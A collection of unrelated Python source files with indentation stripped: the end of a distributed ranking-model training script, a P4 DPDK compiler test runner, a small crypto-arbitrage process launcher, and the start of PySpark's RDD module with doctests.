shuffle_train=not args.no_shuffle_train,
optim=args.optim)
train_pair_qty = len(train_pairs_all)
if is_distr_train or train_pair_qty < device_qty:
tpart_qty = int((train_pair_qty + device_qty - 1) / device_qty)
train_start = rank * tpart_qty
train_end = min(train_start + tpart_qty, len(qids))
train_pairs = { k : train_pairs_all[k] for k in qids[train_start : train_end] }
else:
train_pairs = train_pairs_all
print('Process rank %d device %s using %d training pairs out of %d' %
(rank, device_name, len(train_pairs), train_pair_qty))
valid_checkpoints = [] if args.valid_checkpoints is None \
else list(map(int, args.valid_checkpoints.split(',')))
param_dict = {
'sync_barrier': sync_barrier,
'device_qty' : device_qty, 'master_port' : master_port,
'rank' : rank, 'is_master_proc' : is_master_proc,
'dataset' : dataset,
'qrels' : qrels, 'qrel_file_name' : qrelf,
'train_pairs' : train_pairs,
'valid_run' : valid_run,
'valid_run_dir' : args.valid_run_dir,
'valid_checkpoints' : valid_checkpoints,
'model_out_dir' : args.model_out_dir,
'model' : model, 'loss_obj' : loss_obj, 'train_params' : train_params
}
if is_distr_train and not is_master_proc:
p = Process(target=do_train, kwargs=param_dict)
p.start()
processes.append(p)
else:
do_train(**param_dict)
for p in processes:
utils.join_and_check_stat(p)
if device_qty > 1:
dist.destroy_process_group()
if __name__ == '__main__':
# A light-weight subprocessing + this is a must for multi-processing with CUDA
utils.enable_spawn()
main_cli()
|
run-dpdk-test.py
|
#!/usr/bin/env python3
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the compiler on a sample P4 V1.2 program
from subprocess import Popen,PIPE
from threading import Thread
import errno
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import glob
SUCCESS = 0
FAILURE = 1
class Options(object):
def __init__(self):
self.binary = "" # this program's name
self.cleanupTmp = True # if false do not remote tmp folder created
self.p4filename = "" # file that is being compiled
self.compilerSrcDir = "" # path to compiler source tree
self.verbose = False
self.replace = False # replace previous outputs
self.dumpToJson = False
self.compilerOptions = []
self.runDebugger = False
self.runDebugger_skip = 0
self.generateP4Runtime = False
self.generateBfRt = False
def usage(options):
name = options.binary
print(name, "usage:")
print(name, "rootdir [options] file.p4")
print("Invokes compiler on the supplied file, possibly adding extra arguments")
print("`rootdir` is the root directory of the compiler source tree")
print("options:")
print(" -b: do not remove temporary results for failing tests")
print(" -v: verbose operation")
print(" -f: replace reference outputs with newly generated ones")
print(" -a \"args\": pass args to the compiler")
print(" --p4runtime: generate P4Info message in text format")
print(" --bfrt: generate BfRt message in text format")
def isError(p4filename):
# True if the filename represents a p4 program that should fail
return "_errors" in p4filename
def ignoreStderr(options):
for line in open(options.p4filename):
if "P4TEST_IGNORE_STDERR" in line:
return True
return False
class Local(object):
# object to hold local vars accessable to nested functions
pass
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print(args[0], args[len(args) - 1]) # handy for manual cut-and-paste
print(" ".join(args))
local = Local()
local.process = None
local.filter = None
def target():
procstderr = None
if stderr is not None:
# copy stderr to the specified file, stripping file path prefixes
# from the start of lines
outfile = open(stderr, "w")
# This regex is ridiculously verbose; it's written this way to avoid
# features that are not supported on both GNU and BSD (i.e., macOS)
# sed. BSD sed's character class support is not great; for some
# reason, even some character classes that the man page claims are
# available don't seem to actually work.
local.filter = Popen(['sed', '-E',
r's|^[-[:alnum:][:punct:][:space:]_/]*/([-[:alnum:][:punct:][:space:]_]+\.[ph]4?[:(][[:digit:]]+)|\1|'],
stdin=PIPE, stdout=outfile)
procstderr = local.filter.stdin
local.process = Popen(args, stderr=procstderr)
local.process.wait()
if local.filter is not None:
local.filter.stdin.close()
local.filter.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
if options.verbose:
print("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
def compare_files(options, produced, expected, ignore_case):
if options.replace:
if options.verbose:
print("Saving new version of ", expected)
shutil.copy2(produced, expected)
return SUCCESS
if options.verbose:
print("Comparing", expected, "and", produced)
args = "-B -u -w"
if ignore_case:
args = args + " -i"
cmd = ("diff " + args + " " + expected + " " + produced + " >&2")
if options.verbose:
print(cmd)
exitcode = subprocess.call(cmd, shell=True)
if exitcode == 0:
return SUCCESS
else:
return FAILURE
def check_generated_files(options, tmpdir, expecteddir):
files = os.listdir(tmpdir)
for file in files:
if options.verbose:
print("Checking", file)
produced = os.path.join(tmpdir, file)
expected = os.path.join(expecteddir, file)
if not os.path.isfile(expected):
if options.verbose:
print("Expected file does not exist; creating", expected)
shutil.copy2(produced, expected)
else:
result = compare_files(options, produced, expected, file[-7:] == "-stderr")
# We do not want to compare stderr output generated by p4c-dpdk
if result != SUCCESS and (file[-7:] == "-error"):
return SUCCESS
if result != SUCCESS and not ignoreStderr(options):
return result
return SUCCESS
def file_name(tmpfolder, base, suffix, ext):
return os.path.join(tmpfolder, base + "-" + suffix + ext)
def process_file(options, argv):
assert isinstance(options, Options)
tmpdir = tempfile.mkdtemp(dir=".")
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
if "_samples/" in dirname:
expected_dirname = dirname.replace("_samples/", "_samples_outputs/", 1)
elif "_errors/" in dirname:
expected_dirname = dirname.replace("_errors/", "_errors_outputs/", 1)
elif "p4_14/" in dirname:
expected_dirname = dirname.replace("p4_14/", "p4_14_outputs/", 1)
elif "p4_16/" in dirname:
expected_dirname = dirname.replace("p4_16/", "p4_16_outputs/", 1)
else:
expected_dirname = dirname + "_outputs" # expected outputs are here
if not os.path.exists(expected_dirname):
os.makedirs(expected_dirname)
if options.verbose:
print("Writing temporary files into ", tmpdir)
stderr = os.path.join(tmpdir, basename + "-error")
spec = os.path.join(tmpdir, basename + ".spec")
p4runtimeFile = os.path.join(tmpdir, basename + ".p4info.txt")
p4runtimeEntriesFile = os.path.join(tmpdir, basename + ".entries.txt")
bfRtSchemaFile = os.path.join(tmpdir, basename + ".bfrt.json")
def getArch(path):
v1Pattern = re.compile('include.*v1model\.p4')
pnaPattern = re.compile('include.*pna\.p4')
psaPattern = re.compile('include.*psa\.p4')
ubpfPattern = re.compile('include.*ubpf_model\.p4')
with open(path, 'r', encoding='utf-8') as f:
for line in f:
if v1Pattern.search(line):
return "v1model"
elif psaPattern.search(line):
return "psa"
elif pnaPattern.search(line):
return "pna"
elif ubpfPattern.search(line):
return "ubpf"
return None
if not os.path.isfile(options.p4filename):
raise Exception("No such file " + options.p4filename)
args = ["./p4c-dpdk", "--dump", tmpdir, "-o", spec] + options.compilerOptions
arch = getArch(options.p4filename)
if arch is not None:
args.extend(["--arch", arch])
if options.generateP4Runtime:
args.extend(["--p4runtime-files", p4runtimeFile])
args.extend(["--p4runtime-entries-files", p4runtimeEntriesFile])
if options.generateBfRt:
args.extend(["--bf-rt-schema", bfRtSchemaFile])
if "p4_14" in options.p4filename or "v1_samples" in options.p4filename:
args.extend(["--std", "p4-14"])
args.extend(argv)
if options.runDebugger:
if options.runDebugger_skip > 0:
options.runDebugger_skip = options.runDebugger_skip - 1
else:
args[0:0] = options.runDebugger.split()
os.execvp(args[0], args)
result = run_timeout(options, args, timeout, stderr)
if result != SUCCESS:
print("Error compiling")
print("".join(open(stderr).readlines()))
# If the compiler crashed fail the test
if 'Compiler Bug' in open(stderr).readlines():
return FAILURE
# invert result
expected_error = isError(options.p4filename)
if expected_error and result == SUCCESS:
result = FAILURE
if result == SUCCESS:
result = check_generated_files(options, tmpdir, expected_dirname)
if options.cleanupTmp:
if options.verbose:
print("Removing", tmpdir)
shutil.rmtree(tmpdir)
return result
def isdir(path):
try:
return stat.S_ISDIR(os.stat(path).st_mode)
except OSError:
return False
######################### main
def main(argv):
options = Options()
options.binary = argv[0]
if len(argv) <= 2:
usage(options)
sys.exit(FAILURE)
options.compilerSrcdir = argv[1]
argv = argv[2:]
if not os.path.isdir(options.compilerSrcdir):
print(options.compilerSrcdir + " is not a folder", file=sys.stderr)
usage(options)
sys.exit(FAILURE)
while argv[0][0] == '-':
if argv[0] == "-b":
options.cleanupTmp = False
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-f":
options.replace = True
elif argv[0] == "-j":
options.dumpToJson = True
elif argv[0] == "-a":
if len(argv) == 0:
print("Missing argument for -a option")
usage(options)
sys.exit(FAILURE)
else:
options.compilerOptions += argv[1].split()
argv = argv[1:]
elif argv[0][1] == 'D' or argv[0][1] == 'I' or argv[0][1] == 'T':
options.compilerOptions.append(argv[0])
elif argv[0][0:4] == "-gdb":
options.runDebugger = "gdb --args"
if len(argv[0]) > 4:
options.runDebugger_skip = int(argv[0][4:]) - 1
elif argv[0] == "--p4runtime":
options.generateP4Runtime = True
elif argv[0] == "--bfrt":
options.generateBfRt = True
else:
print("Unknown option ", argv[0], file=sys.stderr)
usage(options)
sys.exit(FAILURE)
argv = argv[1:]
if 'P4TEST_REPLACE' in os.environ:
options.replace = True
options.p4filename=argv[-1]
options.testName = None
if options.p4filename.startswith(options.compilerSrcdir):
options.testName = options.p4filename[len(options.compilerSrcdir):]
if options.testName.startswith('/'):
options.testName = options.testName[1:]
if options.testName.endswith('.p4'):
options.testName = options.testName[:-3]
result = process_file(options, argv)
if isError(options.p4filename) and result == FAILURE:
print("Program was expected to fail")
sys.exit(result)
if __name__ == "__main__":
main(sys.argv)
|
main.py
|
from multiprocessing import Process
from trade import arbitrage
def main():
procs = [
Process(target=arbitrage, args=(ex, )) for ex in ['Bittrex', 'Kraken']
]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import do_server_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
port, auth_secret = sock_info
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(15)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
sockfile = sock.makefile("rwb", 65536)
do_server_auth(sockfile, auth_secret)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
